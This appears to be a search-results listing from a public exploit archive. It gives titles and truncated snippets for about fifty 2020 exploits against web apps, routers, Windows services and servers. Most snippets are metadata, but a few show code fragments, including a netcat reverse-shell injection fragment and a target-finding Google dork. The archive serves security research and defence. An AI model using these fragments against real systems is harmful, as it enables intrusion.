47884 matches found
Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Free MP3 CD Ripper 2.6 %q This module exploits a buffer overflow in Free MP3 CD Ripper versions 2.6 and 2.8. By constructing a specially crafted...
WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting
Exploit Title: WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting Date: 20-11-2020 Exploit Author: Hemant Patidar HemantSolo Vendor Homepage: https://www.wondercms.com/ Version: 3.1.3 Tested on: Windows 10/Kali Linux CVE: CVE-2020-29233 Stored Cross-site scriptingXSS: Stored XSS, also...
Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting
Exploit Title: Nagios Log Server 2.1.7 - 'snapshotname' Persistent Cross-Site Scripting Date: 31.08.2020 Exploit Author: Emre ÖVÜNÇ Vendor Homepage: https://www.nagios.com/ Software Link: https://www.nagios.com/products/nagios-log-server/ Version: 2.1.7 Tested on: Linux/ISO Link:...
Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection
Exploit Title: Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection Date: 13/09/2020 Exploit Author: Gabriele Zuddas Version: 01.01.02.127, 01.01.02.141 CVE : CVE-2020-24365 Service Provider : Linkem Product Name : LTE CPE Model ID : WVRTM-127ACN Serial ID : GMK17041801108...
Gitlab 12.9.0 - Arbitrary File Read (Authenticated)
Exploit Title: Gitlab 12.9.0 - Arbitrary File Read Authenticated Google Dork: - Date: 11/15/2020 Exploit Author: Jasper Rasenberg Vendor Homepage: https://about.gitlab.com Software Link: https://about.gitlab.com/install Version: tested on gitlab version 12.9.0 Tested on: Kali Linux 2020.3 You can...
TestBox CFML Test Framework 4.1.0 - Directory Traversal
Title: TestBox CFML Test Framework 4.1.0 - Directory Traversal Author: Darren King Date: 2020-07-23 Vendor Homepage: https://www.ortussolutions.com/products/testbox Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0 Version : 2.3.0 through to 4.1.0 Tested on: Adob...
Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification
Exploit Title: Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification Google Dork: intitle:"Please Login" "Use FTM Push" Date: 15/11/2020 Exploit Author: Ricardo Longatto Details: This exploit allow change users password from SSLVPN web portal Vendor Homepage:...
M/Monit 3.7.4 - Privilege Escalation
Title: M/Monit 3.7.4 - Privilege Escalation Author: Dolev Farhi Date: 2020-07-09 Vendor Homepage: https://mmonit.com/ Version : 3.7.4 import sys import requests url = 'http://youriphere:8080' username = 'test' password = 'test123' sess = requests.Session sess.gethost def login: print'Attempting t...
TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution
Title: TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution Author: Darren King Date: 2020-07-23 Vendor Homepage: https://www.ortussolutions.com/products/testbox Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0 Version : 2.4.0 throu...
PESCMS TEAM 2.3.2 - Multiple Reflected XSS
Exploit Title: PESCMS TEAM 2.3.2 - Multiple Reflected XSS Date: 2020-11-18 Exploit Author: icekam Vendor Homepage: https://www.pescms.com/ Software Link: https://github.com/lazyphp/PESCMS-TEAM Version: PESCMS Team 2.3.2 CVE: CVE-2020-28092 PESCMS Team 2.3.2 has multiple reflected XSS via the id...
Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure
Exploit Title: Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure Date: 17th November 2020 Exploit Author: Nitesh Surana Vendor Homepage: https://www.gxgroup.eu/ont-products/ Version: P4410-V2-1.34H Tested on: Windows/Kali CVE : CVE-2020-25988 import upnpy upnp = upnpy.UPnP Discover UPnP...
Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)
Exploit Title: Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow PoC Date: November 18, 2020 Exploit Author: Vincent Wolterman Vendor Homepage: http://www.internetdownloadmanager.com/ Software Link: http://www.internetdownloadmanager.com/download.html Version:...
M/Monit 3.7.4 - Password Disclosure
Title: M/Monit 3.7.4 - Password Disclosure Author: Dolev Farhi Date: 2020-07-09 Vendor Homepage: https://mmonit.com/ Version : 3.7.4 import sys import requests url = 'http://youriphere:8080' username = 'test' password = 'test123' sess = requests.Session sess.gethost def login: print'Attempting to...
xuucms 3 - 'keywords' SQL Injection
Exploit Title: xuucms 3 - 'keywords' SQL Injection Date: 2020-11-18 Exploit Author: icekam Vendor Homepage: https://www.cxuu.top/ Software Link: https://github.com/cbkhwx/cxuucmsv3 Version: cxuucms - v3 CVE : CVE-2020-28091 SQL injection exists in search.php. For details, please refer to:...
ZeroLogon - Netlogon Elevation of Privilege
Exploit Title: ZeroLogon - Netlogon Elevation of Privilege Date: 2020-10-04 Exploit Author: West Shepherd Vendor Homepage: https://www.microsoft.com Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2 Tested on: Microsof...
Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated)
Exploit Title : Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting Authenticated Exploit Author : ZwX Exploit Date : 2020-10-23 Vendor Homepage : https://wpforms.com/ Download Plugin : https://downloads.wordpress.org/plugin/wpforms-lite.1.6.3.1.zip + Description Vulnerability:...
BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery
Exploit Title: BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery Date: 2020-09-11 Exploit Author: RedTeam Pentesting GmbH Vendor Homepage: https://bigbluebutton.org/ Version: BigBlueButton 2.2.25 RedTeam Pentesting discovered a vulnerability in the BigBlueButton web...
Microsoft Internet Explorer 11 - Use-After-Free
Exploit Title: Microsoft Internet Explorer 11 - Use-After-Free Date: 2020-05-07 Exploit Author: maxpl0it Vendor Homepage: https://www.microsoft.com/ Software Link: https://www.microsoft.com/en-gb/download/internet-explorer.aspx Version: IE 8, 9, 10, and 11 Tested on: Windows 7 x64 CVE :...
Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting
Exploit Title: Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting Exploit Author: Vulnerability-Lab Date: 2020-11-12 Vendor Homepage: https://froxlor.org/ Software Link: https://froxlor.org/download/ Version: 0.10.16 Document Title: =============== Froxlor v0.10.16 ...
Online Doctor Appointment Booking System PHP and Mysql 1.0 - 'q' SQL Injection
Exploit Title: Online Doctor Appointment Booking System PHP and Mysql 1.0 - 'q' SQL Injection Google Dork: N/A Date: 11/16/2020 Exploit Author: Ramil Mustafayev Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-doctor-appointment-booking-system-php-and-mysql/ Software...
LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path
Exploit Title: Huawei LCDService 1.0.1.0 - 'LCDService' Unquote Service Path Date: 2020-11-07 Exploit Author: Gerardo González Vendor Homepage: https://consumer.huawei.com/mx Software Link: https://consumer.huawei.com/mx Version: 1.0.1.0 Tested on: Windows 10 Home Single Language x64 Esp Step to...
Aerospike Database 5.1.0.3 - OS Command Execution
Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution Date: 2020-08-01 Exploit Author: Matt S Vendor Homepage: https://www.aerospike.com/ Version: &1|nc ip port /tmp/ft&' def getclientcfg: try: return aerospike.client 'hosts': cfg.ahost, cfg.aport, 'policies': 'timeout': 8000.connect...
Apache Struts 2.5.20 - Double OGNL evaluation
Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation Date: 08/18/2020 Exploit Author: West Shepherd Vendor Homepage: https://struts.apache.org/download.cgi Version: Struts 2.0.0 - Struts 2.5.20 S2-059 CVE : CVE-2019-0230 Credit goes to reporters Matthias Kaiser, Apple InformationSecurity,...
Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities
Exploit Title: Joomla Plugin Simple Image Gallery Extended SIGE 3.5.3 - Multiple Vulnerabilities Exploit Author: Vulnerability-Lab Date: 2020-11-11 Vendor Homepage: https://kubik-rubik.de/sige-simple-image-gallery-extended Software Link: https://kubik-rubik.de/sige-simple-image-gallery-extended...
SugarCRM 6.5.18 - Persistent Cross-Site Scripting
Exploit Title: SugarCRM 6.5.18 - Persistent Cross-Site Scripting Exploit Author: Vulnerability-Lab Date: 2020-11-16 Vendor Homepage: https://www.sugarcrm.com Version: 6.5.18 Document Title: =============== SugarCRM v6.5.18 - Contacts Persistent Cross Site Web Vulnerability References Source:...
WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting
Exploit Title: WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting Exploit Author: Vulnerability-Lab Date: 2020-11-13 Vendor Homepage: https://wordpress.org/plugins/buddypress/ Version: 6.2.0 Document Title: =============== Buddypress v6.2.0 WP Plugin - Persistent Web Vulnerabilit...
EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass
Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass Date: 17-11-2020 Exploit Author: Kislay Kumar Vendor Homepage: http://egavilanmedia.com Software Link : http://egavilanmedia.com/user-registration-and-login-system-with-admin-pane=l/ Version:...
Car Rental Management System 1.0 - 'car_id' Sql Injection
Exploit Title: Car Rental Management System 1.0 - 'carid' Sql Injection Date: 2020-11.13 Exploit Author: Mehmet Kelepçe / Gais Cyber Security Author ID: 8763 Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html Software Link:...
PMB 5.6 - 'chemin' Local File Disclosure
Exploit Title: PMB 5.6 - 'chemin' Local File Disclosure Date: 2020-10-13 Google Dork: inurl:opaccss Exploit Author: 41-trk Tarik Bakir Vendor Homepage: http://www.sigb.net Software Link: http://forge.sigb.net/redmine/projects/pmb/files Affected versions : = 5.6 Tested on: Ubuntu 18.04.1 The PMB G...
Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path
Title: Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path Author: Jair Amezcua Date: 2020-11-10 Vendor Homepage: https://www.iobit.com Software Link: https://www.iobit.com/es/advancedsystemcarepro.php Version : 13.0.0.157 Tested on: Windows 10 64bitEN CVE : N/A ...
User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection
Exploit Title: User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection Date: 2020–11–14 Exploit Author: Mayur Parmarth3cyb3rc0p Vendor Homepage: https://phpgurukul.com Software Link:...
Water Billing System 1.0 - 'id' SQL Injection (Authenticated)
Exploit Title: Water Billing System 1.0 - 'id' SQL Injection Authenticated Date: 2020-11-14 Exploit Author: Mehmet Kelepçe / Gais Cyber Security Author ID: 8763 Vendor: https://www.sourcecodester.com/php/14560/water-billing-system-phpmysqli-full-source-code.html Version: 1.0 Tested on: Apache2 an...
Logitech Solar Keyboard Service - 'L4301_Solar' Unquoted Service Path
Title: Logitech Solar Keyboard Service - 'L4301Solar' Unquoted Service Path Author: Jair Amezcua Date: 2020-11-10 Vendor Homepage: https://www.logitech.com/es-mx Software Link: https://support.logi.com/hc/en-us/articles/360024692874--Downloads-Wireless-Solar-Keyboard-K750 Version : 1.10.3.0 Teste...
Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated)
Exploit Title: Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection Authenticated Date: 11-14-2020 Exploit Author: Matthew Aberegg, Alex Prieto Vendor Homepage: https://pandorafms.com/ Patch Link: https://github.com/pandorafms/pandorafms/commit/1258a1a63535f60924fb69b1f7812c678570cc8e Software Link:...
Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated)
Exploit Title: Car Rental Management System 1.0 - 'id' SQL Injection Authenticated Date: 2020-11-14 Exploit Author: Mehmet Kelepçe / Gais Cyber Security Author ID: 8763 Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html Software...
Cisco 7937G - DoS/Privilege Escalation
Exploit Title: Cisco 7937G 1-4-5-7 - DoS/Privilege Escalation Date: 2020-08-10 Exploit Author: Cody Martin Vendor Homepage: https://cisco.com Version: =SIP-1-4-5-7 Tested On: SIP-1-4-5-5, SIP-1-4-5-7 !/usr/bin/python import sys import getopt import requests import paramiko import socket import os...
Car Rental Management System 1.0 - Remote Code Execution (Authenticated)
Exploit Title: Car Rental Management System 1.0 - Remote Code Execution Authenticated Date: 2020-11.13 Exploit Author: Mehmet Kelepçe / Gais Cyber Security Author ID: 8763 Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html...
Atheros Coex Service Application 8.0.0.255 - 'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path
Exploit Title: Atheros Coex Service Application 8.0.0.255 -'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path Exploit Author : Isabel Lopez Exploit Date: 2020-11-13 Vendor Homepage : https://www.file.net/process/athcoexagent.exe.html Link Software :...
KiteService 1.2020.1113.1 - 'KiteService.exe' Unquoted Service Path
Exploit Title: KiteService 1.2020.1113.1 - 'KiteService.exe' Unquoted Service Path Discovery by: IRVIN GIL Discovery Date: 2020-11-14 Vendor Homepage: https://www.kite.com/ Tested Version: 1.2020.1113.1 Vulnerability Type: Unquoted Service Path Tested on OS: Windows 10 x64 es Step to discover...
SAntivirus IC 10.0.21.61 - 'SAntivirusIC' Unquoted Service Path
Exploit Title: SAntivirus IC 10.0.21.61 - 'SAntivirusIC' Unquoted Service Path Discovery by: Mara Ramirez Discovery Date: 10-11-2020 Vendor Homepage: https://www.segurazo.com/download.html Software Links : https://www.segurazo.com/download.html Tested Version: 10.0.21.61 Vulnerability Type:...
OpenCart Theme Journal 3.1.0 - Sensitive Data Exposure
Exploit Title: OpenCart Theme Journal 3.1.0 - Sensitive Data Exposure Date: 11-06-2020 Vendor Homepage: https://www.journal-theme.com/ Vendor Changelog: https://docs.journal-theme.com/changelog Exploit Author: Jinson Varghese Behanan @JinsonCyberSec Author Advisory:...
October CMS Build 465 - Arbitrary File Read Exploit (Authenticated)
Exploit Title: October CMS Build 465 - Arbitrary File Read Exploit Authenticated Date: 2020-03-31 Exploit Author: Sivanesh Ashok Vendor Homepage: https://octobercms.com/ Version: Build 465 and below Tested on: Windows 10 / XAMPP / October CMS Build 465 CVE: CVE-2020-5295 echo ''' Authenticated...
IDT PC Audio 1.0.6425.0 - 'STacSV' Unquoted Service Path
Exploit Title: IDT PC Audio 1.0.6425.0 - 'STacSV' Unquoted Service Path Discovery by: Isabel Lopez Software link: https://www.pconlife.com/download/otherfile/20566/098185e9b7c417cf7480bb9f839db652/ Discovery Date: 2020-11-07 Tested Version: 1.0.6425.0 Vulnerability Type: Unquoted Service Path...
Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion (Metasploit)
require "msf/core" class MetasploitModule "Ghostcat", "Description" = %q When using the Apache JServ Protocol AJP, care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such...
ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'ASUS TM-AC1900 - Arbitrary Command Execution', 'Description' = %q This module exploits a code execution vulnerability within the ASUS TM-AC1900...
Touchbase.io 1.10 - Stored Cross Site Scripting
Exploit Title: Touchbase.io 1.10 - Stored Cross Site Scripting Date: 2020-11-11 Exploit Author: Simran Sankhala Vendor Homepage: https://touchbase.ai/ Software Link: https://touchbase.ai/ Version: 1.1.0 Tested on: Windows 10 Proof Of Concept: touchbase.ai application allows stored XSS, via the 'A...
Citrix ADC NetScaler - Local File Inclusion (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Citrix ADC NetScaler - Local File Inclusion Metasploit', 'Description' = % The remote device is affected by multiple vulnerabilities. An...
DigitalPersona 5.1.0.656 'DpHostW' - Unquoted Service Path
Exploit Title: DigitalPersona 5.1.0.656 'DpHostW' - Unquoted Service Path Discovery by: Teresa Q Discovery Date: 2020-11-11 Vendor:DigitalPersona U. are U. One Touch Version: 5.1.0.656 Vulnerability Type: Unquoted Service Path Vendor Homepage : https://www.hidglobal.com/crossmatch Tested on OS:...
Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Bludit Panel Brute force', 'Description' = %q This Module performs brute force attack on Bludit Panel. , 'Author' = 'Eren Simsek ', 'License' =...
Nidesoft 3GP Video Converter 2.6.18 - Local Stack Buffer Overflow
Exploit Title: Nidesoft 3GP Video Converter 2.6.18 - Local Stack Buffer Overflow Date: 2020-07-30 Author: Felipe Winsnes Software Link: http://www.nidesoft.com/downloads/3gp-video-converter.exe Version: 2.6.18 Tested on: Windows 7 x86 Blog: https://whitecr0wz.github.io/ Proof of Concept: 1.- Run...